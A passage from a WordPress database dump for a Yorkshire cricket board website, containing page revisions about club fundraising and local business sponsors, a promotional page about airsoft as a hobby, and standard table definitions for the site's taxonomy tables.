href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:52:11','2017-07-03 15:52:11','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(68,1,'2017-07-03 15:55:02','2017-07-03 15:55:02','<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-17 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-honours-300x233.jpg\" alt=\"\" width=\"300\" height=\"233\" /></a>Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n\r\n<h3 style=\"text-align: left;\"><strong>Here are some popular ways to raise funds:</strong></h3>\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h2>Local Businesses Support Cricket in Yorkshire</h2>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/rockets\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:55:02','2017-07-03 15:55:02','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(70,1,'2017-10-03 10:16:20','2017-10-03 10:16:20','','Top Businesses in Yorkshire','','publish','closed','closed','','top-businesses-yorkshire','','','2017-10-03 10:19:08','2017-10-03 10:19:08','',0,'https://yorkshirecricketboard.org.uk/?page_id=70',0,'page','',0),(71,1,'2017-10-03 10:16:20','2017-10-03 10:16:20',' ','Top Businesses','','publish','closed','closed','','71','','','2019-02-12 09:24:29','2019-02-12 09:24:29','',0,'https://yorkshirecricketboard.org.uk/71',7,'nav_menu_item','',0),(72,1,'2017-10-03 10:16:20','2017-10-03 10:16:20','','Top Businesses in Yorkshire','','inherit','closed','closed','','70-revision-v1','','','2017-10-03 10:16:20','2017-10-03 10:16:20','',70,'https://yorkshirecricketboard.org.uk/70-revision-v1',0,'revision','',0),(73,1,'2017-10-03 10:19:45','2017-10-03 10:19:45','<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-17 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-honours-300x233.jpg\" alt=\"\" width=\"300\" height=\"233\" /></a>Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n\r\n<h3 style=\"text-align: left;\"><strong>Here are some popular ways to raise funds:</strong></h3>\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h2>Local Businesses Support Cricket in Yorkshire</h2>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/rockets\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"http://www.stuartpease.co.uk/fibre-glass-mouldings.html\" target=\"_blank\">Stuart Pease Fibreglass UK</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-10-03 10:19:45','2017-10-03 10:19:45','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(74,1,'2017-10-03 10:21:18','2017-10-03 10:21:18','<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-17 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-honours-300x233.jpg\" alt=\"\" width=\"300\" height=\"233\" /></a>Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n\r\n<h3 style=\"text-align: left;\"><strong>Here are some popular ways to raise funds:</strong></h3>\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h2>Local Businesses Support Cricket in Yorkshire</h2>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/rockets\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"http://www.stuartpease.co.uk/fibre-glass-mouldings.html\" target=\"_blank\">Stuart Pease Fibreglass UK</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://yorkshiresport.org.uk/\" target=\"_blank\">Yorkshire Sport</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-10-03 10:21:18','2017-10-03 10:21:18','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(76,1,'2019-02-12 09:20:59','2019-02-12 09:20:59','Cricket is not the only sports game in the world, with many other sports fanatics playing games such as airsoft, archery and motorsports.\r\n\r\n<strong>Yorkshire Cricket Fans is a big lover of airsoft.</strong>\r\n\r\nHere we go into more detail about the great hobby and sport, airsoft.  Playing airsoft has many benefits. Continue reading to see the social, physical and mental advantages of playing airsoft as your new hobby.\r\n\r\n<em><a href=\"https://yorkshirecricketboard.org.uk/contact-us\">Get in contact</a> with Yorkshire Cricket Fans to share your love for airsoft.</em>\r\n<h2>What is airsoft?</h2>\r\nAirsoft is a sport/hobby normally played in a large group of people with the correct gear. The aim is to test your skills against live opponents and see who the winning team is.\r\n\r\nIf you are interested in playing airsoft, we suggest buying all your gear and equipment from a reputable company. We recommend Socom Tactical UK, as they are your one stop shop for everything airsoft. Their airsoft bundles are perfect for everybody, from new players to experienced teams. These ideal bundles are great to get you started. <a href=\"https://www.socomtactical.net/airsoft-bundle-deals-1\" target=\"_blank\">Shop here</a>.\r\n\r\n<a href=\"https://www.socomtactical.net/airsoft-bundle-deals-1\" target=\"_blank\"><img class=\"alignnone wp-image-80 size-full\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2019/02/playing-airsoft.jpg\" alt=\"Buy all of your airsoft gear at Socom Tactical UK\" width=\"960\" height=\"640\" /></a>\r\n<h2>Social Benefits</h2>\r\nThe interaction with players from diverse backgrounds is one of the biggest social benefits. People are treated equally in this game and are suitable for everybody over the age of eighteen. You can bond with friends and family about airsoft by sharing a common experience. Memorable moments such as ambushes, assaults or last stands are great things to talk about.\r\n\r\nAirsoft is great for meeting new people outside of your \'home\' / \'work\' field. Interact with people that you have something in common with.\r\n<blockquote>Read More: <a href=\"http://www.ottawalife.com/article/the-benefits-of-airsoft-gaming?c=14\" target=\"_blank\">The Benefits of Airsoft Gaming</a></blockquote>\r\n<h2>Physical Benefits</h2>\r\nAirsoft is a great all over workout. The type of movement involved uses various kinds of muscles that you wouldn\'t normally use from exercising in the gym. You will also have to really coordinate your body movement to achieve a great aiming fire. It is important to have great hand-eye-coordination; however this is something that can be improved whilst playing.\r\n\r\nYou will develop increased endurance along with the ability to manage it properly and perfectly for a game of airsoft.\r\n<blockquote>Take a Look At: <a href=\"https://www.quora.com/What-are-the-advantages-of-having-airsoft-shooting-combat-as-a-hobby\" target=\"_blank\">What are the advantages of having airsoft shooting/combat as a hobby?</a></blockquote>\r\n<h2>Mental Benefits</h2>\r\nThrough practice and dedication, you can improve your overall awareness, especially of your surroundings. You could also gain faster thinking and acting skills, as well as attention to detail. Increased self esteem and confidence is something that many airsoft players have seen a difference in too.','Top Hobbies Around the World','','publish','closed','closed','','top-hobbies-around-world','','','2019-02-12 09:23:08','2019-02-12 09:23:08','',0,'https://yorkshirecricketboard.org.uk/?page_id=76',0,'page','',0),(77,1,'2019-02-12 09:20:59','2019-02-12 09:20:59',' ','Hobbies','','publish','closed','closed','','77','','','2019-02-12 09:24:29','2019-02-12 09:24:29','',0,'https://yorkshirecricketboard.org.uk/77',8,'nav_menu_item','',0),(78,1,'2019-02-12 09:20:59','2019-02-12 09:20:59','Cricket is not the only sports game in the world, with many other sports fanatics playing games such as airsoft, archery and motorsports.\r\n\r\n<strong>Yorkshire Cricket Fans is a big lover of airsoft.</strong>\r\n\r\nHere we go into more detail about the great hobby and sport, airsoft.  Playing airsoft has many benefits. Continue reading to see the social, physical and mental advantages of playing airsoft as your new hobby.\r\n\r\n<em><a href=\"https://yorkshirecricketboard.org.uk/contact-us\">Get in contact</a> with Yorkshire Cricket Fans to share your love for airsoft.</em>\r\n<h2>What is airsoft?</h2>\r\nAirsoft is a sport/hobby normally played in a large group of people with the correct gear. The aim is to test your skills against live opponents and see who the winning team is.\r\n\r\nIf you are interested in playing airsoft, we suggest buying all your gear and equipment from a reputable company. We recommend Socom Tactical UK, as they are your one stop shop for everything airsoft. Their airsoft bundles are perfect for everybody, from new players to experienced teams. These ideal bundles are great to get you started. <a href=\"https://www.socomtactical.net/airsoft-bundle-deals-1\" target=\"_blank\">Shop here</a>.\r\n<h2>Social Benefits</h2>\r\nThe interaction with players from diverse backgrounds is one of the biggest social benefits. People are treated equally in this game and are suitable for everybody over the age of eighteen. You can bond with friends and family about airsoft by sharing a common experience. Memorable moments such as ambushes, assaults or last stands are great things to talk about.\r\n\r\nAirsoft is great for meeting new people outside of your \'home\' / \'work\' field. Interact with people that you have something in common with.\r\n<blockquote>Read More: <a href=\"http://www.ottawalife.com/article/the-benefits-of-airsoft-gaming?c=14\" target=\"_blank\">The Benefits of Airsoft Gaming</a></blockquote>\r\n<h2>Physical Benefits</h2>\r\nAirsoft is a great all over workout. The type of movement involved uses various kinds of muscles that you wouldn\'t normally use from exercising in the gym. You will also have to really coordinate your body movement to achieve a great aiming fire. It is important to have great hand-eye-coordination; however this is something that can be improved whilst playing.\r\n\r\nYou will develop increased endurance along with the ability to manage it properly and perfectly for a game of airsoft.\r\n<blockquote>Take a Look At: <a href=\"https://www.quora.com/What-are-the-advantages-of-having-airsoft-shooting-combat-as-a-hobby\" target=\"_blank\">What are the advantages of having airsoft shooting/combat as a hobby?</a></blockquote>\r\n<h2>Mental Benefits</h2>\r\nThrough practice and dedication, you can improve your overall awareness, especially of your surroundings. You could also gain faster thinking and acting skills, as well as attention to detail. Increased self esteem and confidence is something that many airsoft players have seen a difference in too.','Top Hobbies Around the World','','inherit','closed','closed','','76-revision-v1','','','2019-02-12 09:20:59','2019-02-12 09:20:59','',76,'https://yorkshirecricketboard.org.uk/76-revision-v1',0,'revision','',0),(79,1,'2019-02-12 09:22:05','2019-02-12 09:22:05','','airsoft-guns','','inherit','open','closed','','airsoft-guns','','','2019-02-12 09:22:19','2019-02-12 09:22:19','',76,'https://yorkshirecricketboard.org.uk/wp-content/uploads/2019/02/airsoft-guns.jpg',0,'attachment','image/jpeg',0),(80,1,'2019-02-12 09:22:41','2019-02-12 09:22:41','','playing-airsoft','','inherit','open','closed','','playing-airsoft','','','2019-02-12 09:23:00','2019-02-12 09:23:00','',76,'https://yorkshirecricketboard.org.uk/wp-content/uploads/2019/02/playing-airsoft.jpg',0,'attachment','image/jpeg',0),(81,1,'2019-02-12 09:23:08','2019-02-12 09:23:08','Cricket is not the only sports game in the world, with many other sports fanatics playing games such as airsoft, archery and motorsports.\r\n\r\n<strong>Yorkshire Cricket Fans is a big lover of airsoft.</strong>\r\n\r\nHere we go into more detail about the great hobby and sport, airsoft.  Playing airsoft has many benefits. Continue reading to see the social, physical and mental advantages of playing airsoft as your new hobby.\r\n\r\n<em><a href=\"https://yorkshirecricketboard.org.uk/contact-us\">Get in contact</a> with Yorkshire Cricket Fans to share your love for airsoft.</em>\r\n<h2>What is airsoft?</h2>\r\nAirsoft is a sport/hobby normally played in a large group of people with the correct gear. The aim is to test your skills against live opponents and see who the winning team is.\r\n\r\nIf you are interested in playing airsoft, we suggest buying all your gear and equipment from a reputable company. We recommend Socom Tactical UK, as they are your one stop shop for everything airsoft. Their airsoft bundles are perfect for everybody, from new players to experienced teams. These ideal bundles are great to get you started. <a href=\"https://www.socomtactical.net/airsoft-bundle-deals-1\" target=\"_blank\">Shop here</a>.\r\n\r\n<a href=\"https://www.socomtactical.net/airsoft-bundle-deals-1\" target=\"_blank\"><img class=\"alignnone wp-image-80 size-full\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2019/02/playing-airsoft.jpg\" alt=\"Buy all of your airsoft gear at Socom Tactical UK\" width=\"960\" height=\"640\" /></a>\r\n<h2>Social Benefits</h2>\r\nThe interaction with players from diverse backgrounds is one of the biggest social benefits. People are treated equally in this game and are suitable for everybody over the age of eighteen. You can bond with friends and family about airsoft by sharing a common experience. Memorable moments such as ambushes, assaults or last stands are great things to talk about.\r\n\r\nAirsoft is great for meeting new people outside of your \'home\' / \'work\' field. Interact with people that you have something in common with.\r\n<blockquote>Read More: <a href=\"http://www.ottawalife.com/article/the-benefits-of-airsoft-gaming?c=14\" target=\"_blank\">The Benefits of Airsoft Gaming</a></blockquote>\r\n<h2>Physical Benefits</h2>\r\nAirsoft is a great all over workout. The type of movement involved uses various kinds of muscles that you wouldn\'t normally use from exercising in the gym. You will also have to really coordinate your body movement to achieve a great aiming fire. It is important to have great hand-eye-coordination; however this is something that can be improved whilst playing.\r\n\r\nYou will develop increased endurance along with the ability to manage it properly and perfectly for a game of airsoft.\r\n<blockquote>Take a Look At: <a href=\"https://www.quora.com/What-are-the-advantages-of-having-airsoft-shooting-combat-as-a-hobby\" target=\"_blank\">What are the advantages of having airsoft shooting/combat as a hobby?</a></blockquote>\r\n<h2>Mental Benefits</h2>\r\nThrough practice and dedication, you can improve your overall awareness, especially of your surroundings. You could also gain faster thinking and acting skills, as well as attention to detail. Increased self esteem and confidence is something that many airsoft players have seen a difference in too.','Top Hobbies Around the World','','inherit','closed','closed','','76-revision-v1','','','2019-02-12 09:23:08','2019-02-12 09:23:08','',76,'https://yorkshirecricketboard.org.uk/76-revision-v1',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (1,2,0),(10,3,0),(13,4,0),(16,5,0),(25,6,0),(26,6,0),(27,6,0),(28,6,0),(29,6,0),(30,6,0),(48,6,0),(71,6,0),(77,6,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,0),(2,2,'category','',0,1),(3,3,'category','',0,1),(4,4,'category','',0,1),(5,5,'category','',0,1),(6,6,'nav_menu','',0,9);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Future','future',0),(3,'Grounds','grounds',0),(4,'History','history',0),(5,'Honours','honours',0),(6,'main','main',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=35 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
